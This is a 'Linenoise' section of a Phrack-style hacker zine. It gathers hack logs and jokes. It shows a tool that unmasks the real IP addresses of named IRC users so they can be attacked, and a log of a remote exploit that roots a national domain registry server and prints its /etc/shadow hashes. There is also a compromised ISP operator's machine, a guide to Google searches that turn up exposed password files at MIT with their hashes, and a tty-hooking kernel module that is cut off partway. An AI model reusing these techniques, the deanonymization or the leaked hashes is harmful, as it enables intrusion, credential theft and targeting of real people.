                            ==Phrack Inc.==

               Volume 0x0b, Issue 0x3f, Phile #0x03 of 0x0f

|=-------------------------=[ L I N E N O I Z E ]=------------------------=|
|=------------------------------------------------------------------------=|
|=----------------------------=[ phrackstaff ]=---------------------------=|

	Everything that does not fit somewhere else can be found here.
Corrections and additions to previous articles, too short articles or
articles that just dont make it, funny hacklogs....everything.



|=[ 0x01 ]=---------------------------------------------------------------=|

Finding the Whitehat
- an0nym0us


This brief user submission shows the lengths that some people will go to
find the real IPs of known whitehats so that they can then be owned and
rm'd.

Enter the whitehat anti-witness protection program.
Here's what happens to snitches on the net:


root@mallory:/ezbake# ./burn `cat plaintext/netric-org.new2`
   /* cool awesome hacker header censored by pstaff */

Round    1 - Hamming distance: 22 - k0: 0x97c80e49 k1: 0x81c4058b k2: 0x79f481f2
Round    2 - Hamming distance: 18 - k0: 0xf0e28106 k1: 0x4861ad99 k2: 0x5f405d15
Round    3 - Hamming distance: 15 - k0: 0x0984e0b9 k1: 0xd1983d94 k2: 0x68042d31
Round    4 - Hamming distance: 14 - k0: 0x0984e0b5 k1: 0xd1983d90 k2: 0x68042d2d
Round    5 - Hamming distance: 12 - k0: 0x4904e0b5 k1: 0xd1183d90 k2: 0x68042d2d
Round    6 - Hamming distance: 11 - k0: 0x2984e0bd k1: 0xb1983d70 k2: 0x68042d15
Round    7 - Hamming distance:  9 - k0: 0x4884e0b0 k1: 0xd0983d9b k2: 0x68042ca9
Round    8 - Hamming distance:  8 - k0: 0x0804e0c0 k1: 0x90183d5b k2: 0x68042d39
Round    9 - Hamming distance:  7 - k0: 0x0804e0d0 k1: 0x90183d4b k2: 0x68042d39
Round   10 - Hamming distance:  7 - k0: 0x0804e0d0 k1: 0x90183d4b k2: 0x68042d39
Round   11 - Hamming distance:  6 - k0: 0x0804e0ce k1: 0x90183d45 k2: 0x68042d39
Round   12 - Hamming distance:  5 - k0: 0x4804f0cc k1: 0xd0183c87 k2: 0x68043d79
Round   13 - Hamming distance:  4 - k0: 0x0804f0ce k1: 0x90183d85 k2: 0x68043c79
Round   14 - Hamming distance:  4 - k0: 0x0804f0ce k1: 0x90183d85 k2: 0x68043c79
Round   15 - Hamming distance:  4 - k0: 0x0804f0ce k1: 0x90183d85 k2: 0x68043c79
Round   16 - Hamming distance:  3 - k0: 0x4808f0ce k1: 0xd0103d85 k2: 0x68083c79
Round   17 - Hamming distance:  2 - k0: 0x0800f0ce k1: 0x90003d85 k2: 0x68003c79
Round   18 - Hamming distance:  2 - k0: 0x0800f0ce k1: 0x90003d85 k2: 0x68003c79
Round   19 - Hamming distance:  1 - k0: 0x4800f0ce k1: 0xd0007d85 k2: 0x68007c79
Round   20 - Hamming distance:  1 - k0: 0x4800f0ce k1: 0xd0007d85 k2: 0x68007c79
Round   21 - Hamming distance:  1 - k0: 0x4800f0ce k1: 0xd0007d85 k2: 0x68007c79
MATCH: 0x0000d0ce 0x00007d85 0x00005c79

>> w0a, str0ng keys, especially the most significant word

--------------- --  -
| eSDee (~eSDee@2EC0E90E.914AD78D.7FC28CE1.IP) (unknown)
 ircname  : eSDee
| channels : @#netric
 server   : irc.netric.org (Netric IRC Server)
| operator : eSDee  (is NOT an IRC warrior)
| help     : eSDee - is available for help.
| eSDee was (~eSDee@2EC0E90E.914AD78D.7FC28CE1.IP)

root@mallory:/ezbake# ./burn -d 2EC0E90E.914AD78D.7FC28CE1.IP -k 0x0000d0ce 0x00007d85 0x00005c79

[+] 213.201.176.198

--------------- --  -
| Laurens (~laurens@DD81E3B.D2642F0E.15F667A0.IP) (unknown)
 ircname  : laurens
| channels : @#netric
 server   : irc.netric.org (Netric IRC Server)
| operator : Laurens  (is NOT an IRC warrior)
| help     : Laurens - is available for help.

root@mallory:/ezbake# ./burn -d DD81E3B.D2642F0E.15F667A0.IP -k 0x0000d0ce
0x00007d85 0x00005c79

[+] 81.17.46.157

--------------- --  -
| Tex (~Tex@398AD8F4.5D1F7852.16B25093.IP) (unknown)
 ircname  : Tex - Representative of Shadows
| channels : @#netric
 server   : irc.netric.org (Netric IRC Server)
: idle     : 1 hours 24 mins 57 secs (signon: Tue Sep 23 17:16:13 2003)

root@mallory:/ezbake# ./burn -d 398AD8F4.5D1F7852.16B25093.IP -k 0x0000d0ce 0x00007d85 0x00005c79

[+] 213.214.43.116

--------------- --  -
| Argv[] (~argv@2ECA21BE.36EC7F5.1BE1D223.IP) (unknown)
 ircname  : "Survival of the fittest." -- Darwin._
| channels : @#netric
 server   : irc.netric.org (Netric IRC Server)
: idle     : 23 hours 15 mins 25 secs (signon: Mon Sep 22 20:09:56 2003)

root@mallory:/ezbake# ./burn -d 2ECA21BE.36EC7F5.1BE1D223.IP -k 0x0000d0ce
0x00007d85 0x00005c79

[+] 193.77.159.230

--------------- --  -
| [Elwin]-gone (~Elwin@2E9E2501.725E068F.50F7261E.IP) (unknown)
 ircname  : http://Elwin.ChatValley.nl
| channels : @#netric
 server   : irc.netric.org (Netric IRC Server)
: idle     : 23 hours 17 mins 53 secs (signon: Mon Sep 22 20:09:52 2003)

root@mallory:/ezbake# ./burn -d 2E9E2501.725E068F.50F7261E.IP -k 0x0000d0ce 0x00007d85 0x00005c79

[+] 81.171.2.188

--------------- --  -
| newroot (~seprioth@29A5FFF4.46779EFE.7026342B.IP) (unknown)
 ircname  : seprioth
| channels : @#netric
 server   : irc.netric.org (Netric IRC Server)
: idle     : 1 hours 1 mins 21 secs (signon: Tue Sep 23 18:26:43 2003)

root@mallory:/ezbake# ./burn -d 29A5FFF4.46779EFE.7026342B.IP -k 0x0000d0ce 0x00007d85 0x00005c79

[+] 212.6.91.195

--------------- --  -
| h4x0r (~kiss@39C0CF3C.EC41C18A.37392DA9.IP) (unknown)
 ircname  : Level Seven Digital
| channels : @#netric
 server   : irc.netric.org (Netric IRC Server)
: idle     : 23 hours 18 mins 43 secs (signon: Mon Sep 22 20:09:39 2003)

[+] 219.101.83.40

--------------- --  -
| feeble (~null@25E7EE98.668A5C0B.75AA0ACB.IP) (unknown)
 ircname  : null
| channels : @#netric
 server   : irc.netric.org (Netric IRC Server)
: idle     : 17 hours 0 mins 42 secs (signon: Mon Sep 22 20:09:59 2003)

root@mallory:/ezbake# ./burn -d 25E7EE98.668A5C0B.75AA0ACB.IP -k 0x0000d0ce 0x00007d85 0x00005c79

[+] 209.26.65.169




|=[ 0x02 ]=---------------------------------------------------------------=|

Ownage log of Network Information Center Madagascar
- az14n xtr4v4g4nz4

* EDITOR'S NOTE * : This shit is pretty fuckin gay, and I'm not sure why we
included it, apart from filling the void left by a lack of user
submissions, but it should give you an insight into how people like s1/
dvdman hack.
* * * * * * * * *

openssl remote apache juarez!@#

[+]  SSL k0nn3kti0nz

cipher: 0x405a454c   ciphers: 0x81227b8
Session:
0000 - e6 35 88 5b d9 e8 23 15 fe 5d e7 6b 44 b7 d8 4d
0010 - 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0020 - 20 00 00 00 63 35 30 32 30 39 37 30 62 35 38 35
0030 - 32 38 64 33 31 61 30 31 33 32 33 62 34 36 63 36
0040 - 64 38 35 66 00 00 00 00 08 84 12 08 00 00 00 00
0050 - 00 00 00 00 01 00 00 00 2c 01 00 00 b3 87 d6 3f
0060 - 00 00 00 00 4c 45 5a 40 00 00 00 00 b8 27 12 08
0070 -
check your addr and hit enter
using 100 threads
using retaddr 0xbffffd00
using retaddr 0xbffffc00
using retaddr 0xbffffb00
using retaddr 0xbffffa00
using retaddr 0xbffff900
using retaddr 0xbffff800
read: Connection reset by peer
using retaddr 0xbffff700
using retaddr 0xbffff600
connected using addr 0xbffff54c
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux ns.nic.mg 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
bash: /usr/bin/w: Permission denied
bash-2.05$
bash-2.05$

*** Few sekz l8r after d0wnl04d1ng s0m3 shietzniT ***

bash-2.05$ ./aa
sh-2.05# id
uid=0(root) gid=0(root) groupes=0(root),10(wheel),6(disk),4(adm),3(sys),2(daemon),1(bin)

*** Few sekz after ex3cut1ng s0m3 "too1z" ***

The authenticity of host 'ns.nic.mg (62.173.234.149)' can't be established.
RSA1 key fingerprint is dc:cd:da:72:fe:6e:db:70:ff:11:e5:cc:b4:27:80:80.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'ns.nic.mg,62.173.234.149' (RSA1) to the list of known hosts.
root@ns.nic.mg's password:
Last login: Tue Dec  9 11:30:41 2003 from 194.214.107.63
No mail.

        WARNING: Your password expires in 11 days

[root@ns root]# uptime; id; uname -a
  6:32am  up 40 days, 18:46,  0 users,  load average: 0.00, 0.00, 0.00
Linux ns.nic.mg 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i686 unknown
uid=0(root) gid=0(root) groupes=0(root),10(wheel),6(disk),4(adm),3(sys),2(daemon),1(bin)
[root@ns root]# ls -a /var/named
./           194.214.107.rev  com.mg  isoc.mg      mg20031112   mil.mg       net.mg     org.mg      save/
../          asso.mg          edu.mg  mg           mg.20031118  named.ca     nic.mg     prd.mg
127.0.0.rev  co.mg            gov.mg  mg_20031028  mg.20031127  named.local  nic.mg.db  root.hints
[root@ns root]# cat /etc/shadow
root:$1$b1HQyHcU$3nSVn8nT/EwJoGZzo/k8G/:12347:0:60:7:30:-1:1235198
bin:*:11869:0:60:7:::
daemon:*:11869:0:60:7:::
adm:*:11869:0:60:7:::
lp:*:11869:0:60:7:::
sync:*:11869:0:60:7:::
shutdown:*:11869:0:60:7:::
halt:*:11869:0:60:7:::
mail:*:11869:0:60:7:::
news:*:11869:0:60:7:::
uucp:*:11869:0:60:7:::
operator:*:11869:0:60:7:::
games:*:11869:0:60:7:::
gopher:*:11869:0:60:7:::
postgres:x:11869:0:60:7:::
ftp:*:11869:0:60:7:::
squid:x:11869:0:60:7:::
gdm:x:11869:0:60:7:::
htdig:*:11869:0:60:7:::
dhcpd:*:11869:0:60:7:::
named:*:11869:0:60:7:::
postfix:*:11869:0:60:7:::
snort:x:11869:0:60:7:::
nscd:x:11869:0:60:7:::
rpm:*:11869:0:60:7:::
apache:*:11869:0:60:7:::
rpcuser:*:11869:0:60:7:::
rpc:*:11869:0:60:7:::
sympa:*:11869:0:60:7:::
gica:*:11869:0:60:7:::
ldap:x:11869:0:60:7:::
vpopmail:*:11869:0:60:7:::
alias:*:11869:0:60:7:::
qmaild:*:11869:0:60:7:::
qmaill:*:11869:0:60:7:::
qmailp:*:11869:0:60:7:::
qmailq:*:11869:0:60:7:::
qmailr:*:11869:0:60:7:::
qmails:*:11869:0:60:7:::
dnscache:*:11869:0:60:7:::
dnslog:*:11869:0:60:7:::
tinydns:*:11869:0:60:7:::
axfrdns:*:11869:0:60:7:::
nobody:*:11869:0:60:7:::
xfs:!!:11869:0:60:7:::
mysql:!!:11869:0:60:7:::
ramboa:$1$JmsNoIyT$btZ6ua/K/yYJiLnVUQYLP1:12347:0:60:7:30:-1:3270910
sshd:!!:11870:0:60:7:::
haja:$1$geO6qeHQ$Qr6LI21blDXgQgPTsBYll0:12061:0:60:7:30::1075898622
raft:$1$n7TZ4rYD$ES9PKofmF1BsKbqxJK/UG0:12167:0:60:7:30::3270910
[root@ns root]#
[root@ns root]#
[root@ns root]# exit
Connection to ns.nic.mg closed.


|=[ 0x03 ]=---------------------------------------------------------------=|

IRC.NAC.NET Operator Gets Owned
- anonymous aggressive irc dude


* EDITORIAL INTERJECTION: While this log wasn't exactly what we would call
a pinnacle of achievement in terms of hacklogs, we edited some of it out 
and left the slightly amusing/interesting parts *

#do this to restart spammer "not only is he an oper but a spammer"
cat q-read | grep local | sort | uniq -c | sort -nr > mail-to
cat q-read | grep "<" | tr -s ' ' | cut -f8 -d' ' | sort | uniq -c | sort -rn >
mail-from
zvv261.com
moneysaversx.com
members.mdmedia2.com
bmw1967.com
gonetdeals.com
yourbigfun.com
wotch.com
email.com
dlbnetwork.net
rbexpress.org
optindeals
offers-
selectmediagroup.com
good-karma-inc.com
zvv261.com
latinababes
livenlearn13
kibitzers-return
joke-of-the-day-return-

...

qmaild     137  0.0  0.0   920  528 con- S     8:45AM   1:05.18 /usr/local/bin/t
cpserver -v -R -H -x/etc/smtp.rules.cdb -c509 -u 1002 -g 1001 207.99.0.69 smtp /
usr/local/bin/fixcrio /var/qmail/bin/qmail-smtpd
root       139  0.0  0.0   920  528 con- S     8:45AM   3:17.08 /usr/local/bin/t
cpserver -v -R -H -c150 207.99.0.69 pop3 /var/qmail/bin/qmail-popup mercury.nac.
net /var/qmail/bin/checkpoppasswd /var/qmail/bin/qmail-pop3d Maildir
root      1422  0.0  0.0   932  568  ??  S     8:45AM   0:36.46 /usr/lib/courier
-imap/libexec/couriertcpd -address=207.99.0.69 -stderrlogger=/usr/lib/courier-im
ap/libexec/courierlogger -stderrloggername=imapd -maxprocs=100 -maxperip=4 -pid=
/var/run/imapd.pid -nodnslookup -noidentlookup 143 /usr/lib/courier-imap/sbin/im
aplogin /usr/lib/courier-imap/libexec/authlib/authdaemon /usr/lib/courier-imap/b
in/imapd Maildir
root     13596  0.0  0.0   932  576  ??  S    12:24PM   0:00.29 /usr/lib/courier
-imap/libexec/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/libexec
/courierlogger -stderrloggername=imapd-ssl -maxprocs=100 -maxperip=4 -pid=/var/r
un/imapd-ssl.pid -nodnslookup -noidentlookup 993 /usr/lib/courier-imap/bin/couri
ertls -server -tcpd /usr/lib/courier-imap/sbin/imaplogin /usr/lib/courier-imap/l
ibexec/authlib/authdaemon /usr/lib/courier-imap/bin/imapd Maildir
root     22240  0.0  0.0  2256 1372  ??  S     4:09PM   0:00.74 couriertls -loca
lfd=4 -tcpd -server
qmaild    9008  0.0  0.0   920  532  pb- S     6:34PM   0:03.13 /usr/local/bin/t
cpserver -R -H -x/etc/auth.rules.cdb -c250 -u 1002 -g 1001 207.99.0.70 smtp /var
/qmail/bin/qmail-smtpd-auth smtp-auth.nac.net /var/qmail/bin/checksmtppasswd /us
r/bin/true
root     57564  0.0  0.0  2256 1508  ??  S    10:13PM   0:00.41 couriertls -loca
lfd=4 -tcpd -server
root     37381  0.0  0.0  2256 1588  ??  S    10:59PM   0:00.14 couriertls -loca
lfd=4 -tcpd -server
root      1021  0.0  0.0  1104  792  p0  R+   11:42PM   0:00.00 grep tcp (bash)
qmaild     133  0.0  0.0   920  528 con- I     8:45AM   1:31.38 /usr/local/bin/t
cpserver -v -R -H -x/etc/smtp.rules.cdb -c509 -u 1002 -g 1001 64.21.52.92 smtp /
usr/local/bin/fixcrio /var/qmail/bin/qmail-smtpd
qmaild     135  0.0  0.0   920  528 con- S     8:45AM   4:24.47 /usr/local/bin/t
cpserver -v -R -H -x/etc/smtp.rules.cdb -c509 -u 1002 -g 1001 207.99.0.26 smtp /
usr/local/bin/fixcrio /var/qmail/bin/qmail-smtpd

...


 Volume in drive C is MAIN
 Volume Serial Number is 94A4-D96A

 Directory of C:\

07/21/2003  08:27 PM           382,006 2003-07-21-weather.bmp
06/26/2003  05:19 PM                44 800 fiasco.txt
05/21/2003  01:41 AM             9,569 agreement between joel tew and NAC may 20 2003.wpd
06/15/2003  10:37 PM            18,534 AlmostGone.jpg
08/22/2002  02:48 PM                 0 AUTOEXEC.BAT
06/02/2003  01:38 AM    <DIR>          bink
07/13/2003  09:19 AM    <DIR>          Canon
06/08/2003  01:41 AM            61,440 CAPTURE.AVI
05/13/2003  08:18 AM    <DIR>          cisco
08/22/2002  02:48 PM                 0 CONFIG.SYS
05/13/2003  10:13 PM    <DIR>          Crestron
08/23/2002  02:57 PM    <DIR>          CX3D
08/26/2002  12:16 PM    <DIR>          CxClient
05/13/2003  12:26 AM    <DIR>          cygwin   <--oh lord
07/26/2003  09:14 AM               140 deck stuffs.txt
05/17/2003  11:50 AM            23,617 dednow.txt
04/25/2003  09:26 PM    <DIR>          DeLorme Docs
04/11/2003  11:00 PM    <DIR>          digital pics
07/17/2003  09:54 PM               201 DMF2_WKLog.txt
04/22/2003  05:21 PM    <DIR>          Documents and Settings
05/19/2003  02:27 AM             1,303 Download.qif
07/02/2003  08:51 AM             4,752 dp.txt
03/27/2003  09:11 PM    <DIR>          dvv
05/19/2003  10:26 AM            83,456 ez.vsd
08/25/2002  04:40 PM    <DIR>          games
06/11/2003  01:49 PM            18,003 GatorPatch.log
06/24/2003  09:00 PM    <DIR>          gnugk
06/03/2003  09:40 PM             3,904 iix-peers.txt
06/01/2003  12:54 PM    <DIR>          iso
07/23/2003  03:44 PM    <DIR>          jeannine
04/27/2003  09:31 PM            12,974 jmr-ahr-atv-sunday.plt
07/24/2003  01:27 PM             3,276 mail.txt
04/19/2003  11:20 PM    <DIR>          Mapping
06/06/2003  07:32 AM             2,528 mtr.txt
11/25/2002  09:15 PM    <DIR>          My Documents
06/02/2003  12:25 AM    <DIR>          My Downloads
04/28/2003  07:56 PM            30,720 NAC PHL01 MX Sheet.xls
07/17/2003  08:32 PM    <DIR>          nomad2
04/19/2003  11:03 PM    <DIR>          OziExplorer
07/17/2003  09:30 PM    <DIR>          Program Files
07/23/2003  09:12 AM            79,846 pViewRes.pdf
03/07/2003  02:06 AM    <DIR>          Sti
06/01/2003  07:45 PM             8,161 t.tpr
03/16/2003  11:56 AM    <DIR>          TEMP
04/27/2003  09:45 PM             9,917 track99.txt
04/25/2003  05:19 PM            14,336 trx250x parts.xls
03/28/2003  12:23 AM    <DIR>          vb-proj
06/08/2003  11:49 PM    <DIR>          winaprs
07/17/2003  09:30 PM    <DIR>          WINDOWS
04/08/2003  08:59 PM         1,716,685 zoc411_win_english.exe
              24 File(s)      2,485,412 bytes <--owned
              26 Dir(s)  51,500,957,696 bytes free 

... 
 _____________________________________________
| latency (alex@host-72-on-the-lake.ahr.nac.net)
| name : Alex
| chan : @#nanog @#gaysex @#ownd
| serv : irc.nac.net




|=[ 0x04 ]=---------------------------------------------------------------=|

REAL Google Hacks
- n1elz pr0v0s

Disclaimer
----------
Iph j00 g3t buzted c0s oph diz den j00 r a lahmer.

Hey y0. Maybe like me you got kinda excited by that new book that came out 
"Google Hacks". Wow, I thought. Is this finally a book documenting all those 
neat little holes in the google CGI interface for all to see?!? But, no.
This is 325 mind-numbing pages on how to use a search engine. Geez, I mean
it's not like divineint hasn't been trading googlesrc.tgz since summer 2002
(parser.c, line 264 is always fun if you like a laugh).
Anyway, before I took the book back and exchanged it for 2million copies of 
route's latest Hacker's Challenge book I thought I'd flick thought it and 
surprisingly it actually gave me a few ideas about how this crap could be
used to actually hack. So yea here's all the infoz I could be bothered to dig
up, phresh for you phrackerz. (I tried to sell the concept to O'reilly but
they wouldn't give).

---
http://www.google.com/search?q=daemon:NP:6445:&hl=en&lr=&ie=UTF-8&start=10&sa=N

 Web Images Groups Directory News 
	
Searched the web for daemon:NP:6445:. Results 11-20 of about 109. Search took
0.11 seconds.

<Lotz of crap here>

<html> <head> </head><body><pre>&lt;html&gt; &lt;head&gt; &lt;/ ...
... &amp;lt;html&amp;gt; &amp;lt;head&amp;gt; &amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;&amp;lt;pre&amp;gt;root:SSpbaftOt8rE6:8573:::::
daemon:NP:6445::::: bin:NP ...
www.mit.edu/afs/athena/system/config/passwd/sun4x_56/shadow - 1k - Cached - Similar pages

<loads more crap over here>

---

Wow, looks like we hit paydirt right here. Hey wait.. I bet it's a dead
link or something, lets make sure it works...

---

http://www.mit.edu/afs/athena/system/config/passwd/sun4x_56/shadow

root:SSpbaftOt8rE6:8573::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
smtp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
listen:*LK*:::::::
pop:NP:6445::::::
discuss:NP:6445::::::
nobody:NP:6445::::::
noaccess:NP:6445::::::

---

h0h0h0. Lookz like somone forget to configure their afs server properly!
Letz explore a little deeper.

---

http://www.mit.edu/afs/athena/system/config/passwd/

 Parent Directory        08-Jul-2001 01:18      -  
 rhlinux/                07-Feb-2000 22:38      -  
 sgi_53/                 26-May-1998 20:40      -  
 sgi_62/                 26-May-1998 20:40      -  
 sgi_63/                 26-May-1998 20:40      -  
 sgi_65/                 22-Apr-1999 01:06      -  
 sun4m_54/               26-May-1998 20:40      -  
 sun4x_55/               26-May-1998 20:40      -  
 sun4x_56/               26-May-1998 20:40      -  
 sun4x_57/               26-May-1998 20:40      -  
 sun4x_58/               26-May-1998 20:40      -  
 sun4x_59/               26-May-1998 20:40      -  

---
OMG w00t. Lookz like we now have lotza passwords!@
Letz make sure we can acesss them all.
---

http://www.mit.edu/afs/athena/system/config/passwd/sgi_53/passwd

root:SSpbaftOt8rE6:0:0:Super-User:/:/bin/athena/tcsh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
daemon:*:1:1:daemons:/:/dev/null
bin:*:2:2:System Tools Owner:/bin:/dev/null
uucp:*:3:5:UUCP Owner:/usr/lib/uucp:/bin/csh
sys:*:4:0:System Activity Owner:/var/adm:/bin/sh
adm:*:5:3:Accounting Files Owner:/var/adm:/bin/sh
lp:*:9:9:Print Spooler Owner:/var/spool/lp:/bin/sh
nuucp:*:10:10:Remote UUCP User:/var/spool/uucppublic:/usr/lib/uucp/uucico
auditor:*:11:0:Audit Activity Owner:/auditor:/bin/sh
dbadmin:*:12:0:Security Database Owner:/dbadmin:/bin/sh
rfindd:*:66:1:Rfind Daemon and Fsdump:/var/rfindd:/bin/sh
EZsetup:*:992:998:System Setup:/var/sysadmdesktop/EZsetup:/bin/csh
demos:*:993:997:Demonstration User:/usr/demos:/bin/csh
OutOfBox:*:995:997:Out of Box Experience:/usr/people/tour:/bin/csh
guest:*:998:998:Guest Account:/usr/people/guest:/bin/csh
4Dgifts:*:999:998:4Dgifts Account:/usr/people/4Dgifts:/bin/csh
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null
pop:*:50:101:Post Office Protocol,,,,:/var/spool/pop:/dev/null
discuss:*:32000:101:Discuss System,,,,:/var/spool/discuss:/dev/null

---

Yep! It looks like we can!
Letz see what else is on there!

---

http://www.mit.edu/afs/net.mit.edu/system/vax_bsd43/srvd.72/etc/passwd

root:2pEdLRdD8rMnk:0:1:System PRIVILEGED Account:/:/bin/csh
operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser
ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
daemon:*:1:1:Mr Background:/:
sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys:
bin:PASSWORD HERE:3:4:Mr Binary:/bin:

---

Jesus, a VAX! It lookz like we've discovered a true digital Jurrasic Parq
here guyz!@ Ok now we'll try to google for "root:*:0:0:Charlie", this
will find mainly bsd systems.

---

http://www.ensta.fr/~perret/Cours/Securite/Ensta/passwd

Jesus, I'm not even going to paste this because it's juzt not all gonna fit!@

--


That french one has mad passwords for your hacking adventures but the MIT
ones are all root pw'z only. I'd bet pretty highly tho that the main NIS
server (or LDAP or whatever they use) is as fucked up as those so you can
prolly http:// your way to however many hundred thousand passwords. Even
if you can't be bothered doing that then I'm sure there's plenty of kidz
out there who have these 3Ghz boxes for playing quake or smt. Use your 
magination. If you get realjiggy with search stringz then it's possible
to turn out shadow files for all kinda of .gov's (nist, lbl etc) and stuff
so yea, play around.




|=[ 0x05 ]=---------------------------------------------------------------=|

p62 Poll
- http://www.securitybriefing.com/modules.php?name=Surveys&pollID=2

                                     Survey
                                [pixel.gif]

   What is your opinion of "Phrack 62"?
   ( ) Loads of FUD from worthless Black Hats.
   ( ) Good articles but silly/immature commentary.
   (*) The best thing I ever read.




|=[ 0x06 ]=---------------------------------------------------------------=|

p62 Release Announcements Heralded Worldwide


- http://www.informit.com/isapi/weblog_id~%7BCEF1DC33-01E0-45D5-8FCA-348DC993AA75%7D/st~%7B4D022936-8769-4F76-9152-F65D036DEDF9%7D/weblog/showComments.asp

"Fake" Phrack 62 is out
by Seth Fogie - SEP 22, 2003 11:22:24 PM

                                                                0 Replies

Whitehat,  Blackhat, greyhat, or even anti-hat, this edition of Phrack
has  it  all.  If  you  have  never  heard  of Phrack, it is an online
publication that has long held the interests of hackers from all types
of  backgrounds.  Phone  systems,  electronics, traffic lights, and of
course  the typical computer have all been targeted by Phrack authors.
However,  in the last week Phrack 62, also being referred to as a fake
Phrack,  made  its  debut.  While  this  version  definitely  had some
interesting  technical  chapters,  it  provided  several not to subtle
discussions against the whitehat hackers of the world.

Regardless,  if  you  are  looking  for  something  that  is humorous,
technically  interesting,  and  maybe  even  a  little offensive, this
version of Phrack is for you! Just dont believe everything you read

----------------------------------------------------------------------

Found cached on www.professionalsecuritytester.net/

Phracks has been released
Posted by cdupuis on Sunday, September 21 @ 09:01:06 EDT (2 reads)


PHRACK #62 Has Been Released


Phrack Magazine is one of the longest running electronic magazines in
existence, and certainly one of the most interesting.  Since 1985,
Phrack has been providing the hacker community with information on
operating systems, networking technologies and telephony, as well as
relaying features of interest to the international computer underground.
The Phrack Magazine team released a new issue of this Magazine, number 62.

1) Introduction - Phrack Staff
2) Loopback - Phrack Staff
3) Linenoise - Phrack Staff
4) Toolz Armory - elguapo
5) Phrack Prophile on shok - Phrack Staff
6) Eye on the Spy - tr4shc4n m4n
7) Local Honeypot Identification - Joseph Corey
8) Look, a Phone Article!! - d0nn1e n4rk0
9) Writing Plan9 Shellcode - m1lt0n
10) Crucial LKMS for All Hackers - warez mullah
11) New Hacking Manifesto - cr4zy c0nsuel0
12) THE PROJEKT MAYHEM TOOLKIT - d0kt0r m4ngl3r
13) Sneeze: Wreaking Havoc Upon Snort - m1lt0n
15) Phrack World News - Phrack Staff


Additional Information:
The information has been provided by Phrack Staff.




|=[ 0x07 ]=---------------------------------------------------------------=|

THE LEET SPEAK LKM
- KaRELeSS KaRL & warez mullah


y0y0y0, f0r 4ll 0f eWe h4cK3rz 0ut there in h4krsp4ce h3r3 iZ a mod 2 make
the operating system formerly backdoored by suCKit m0re us4ble for 4ll of
eWe el8 h4qrz.

r u s1q of using stran9er/swr's tcl kodez to speak like a ku0ldu0d on irc?
then this lkm is the anzw3r 2 y0ur pray3rz......


Begin Extraction of el8 k0d3z h3r3 ---------------------------------------

#define MODULE
#define __KERNEL__

/* By using this code you subject yourself to submitting to our will. You
   forfeit any and all rights once you have compiled this code. Whitehats
   please take note that we reserve the right to rm your fat ass if we learn
   of its usage. Snosoft and iDefense you still have reserve the right to
   be owned like jobe. Any modifications to this el8 code will result in a
   prompt rm'ing and death by webcam so we can watch for our own amusement
   because we fat goths are simply too big to leave our beds. eEye is the
   root of all microsoft's problems. They are the virii writers that crash
   your XP machine just as Jenna Jameson catches that load in her eye.
   Atstake employees take note, we are watching you. Your continued acts of
   script kiddy'ism will not be tolerated by us or your managers. Further
   acts will result in PHC release of logs for Atstake Management review.
   Now get back to cracking those NT Lan Man passwords and SQL injection
   codes.

   Oh, and have a Merry Fucking Christmas!
*/
/* To Compile: cc -c -o whatthefuckever.o -I/lib/modules/`uname -r`/include thisfile.c */

#include <linux/modversions.h>
#include <linux/sched.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/uaccess.h>
#include <linux/errno.h>
#include <linux/string.h>
#include <asm/segment.h>
#include <asm/unistd.h>
#include <linux/mm.h>
#include <linux/slab.h>
#include <asm/unistd.h>
#include <asm/current.h>
#include <asm/errno.h>
#include <asm/ptrace.h>
#include <asm/pgtable.h>
#include <linux/fs.h>

#define ONE 1
#define NOTONE 0
#define NOTNOTONE 1
#define THEOISGAY 1
#define BEGIN_KMEM { mm_segment_t o = getfs(); setfs(get_ds());
#define END_KMEM   setfs(o); }
#define LANCE_SPITZNERS_HOME_IP " "
#define BAD_INT int
#define GOOD_INT unsigned int
#define CHAR char
#define SECURE_CHAR unsigned char
#define STRUCT struct
#define HOWBIGISIT size_t
#define system memset
#define sys_unlink kmalloc
#define printf kfree
#define fprintf copy_from_user
#define syslog copy_to_user
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,4,9)
#ifdef MODULE_LICENSE
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Phrack Labs");
#endif
#endif


char *targetproclist[] =
{ "epic", "BitchX", NULL };

ssize_t er33t_tty_read(struct file      * file,
                        CHAR            * buf,
                        HOWBIGISIT              count,
                        loff_t          *ppos);
ssize_t (*o_read)       (struct file    * file,
                        CHAR            * buf,
                        HOWBIGISIT              count,
                        loff_t          *ppos);



void play_with_ttys( void );
void stop_molesting_ttys( void );

BAD_INT init_module(void)
{
    play_with_ttys();
    return NOTONE;
}

void
cleanup_module(void)
{
   stop_molesting_ttys();
   return;
}


BAD_INT last_was_leet = 1;


void play_with_ttys( void )
{ (void *) o_read = (void *) current->files->fd[0]->f_op->read;
  current->files->fd[0]->f_op->read = (void *) er33t_tty_read;
};

void stop_molesting_ttys( void )
{ (void *) current->files->fd[0]->f_op->read = (void *) o_read; }


ssize_t er33t_tty_read(struct file      * file,
                        CHAR            * buf,
                        HOWBIGISIT      count,
                        loff_t          *ppos) {
        BAD_INT l;
        GOOD_INT pos;
        CHAR *er33tbuf;
        int i;

        system(buf,0,count);
        l = (*o_read)(file,buf,count,ppos);
        if (l < 0) return THEOISGAY;

        /* added @ the last minute */
        i=0;
        while(targetproclist[i]!=NULL)  {
                if (strstr (current->comm, targetproclist[i]))
                        goto THEO_IS_A_GLORYHOLE_GIRL;
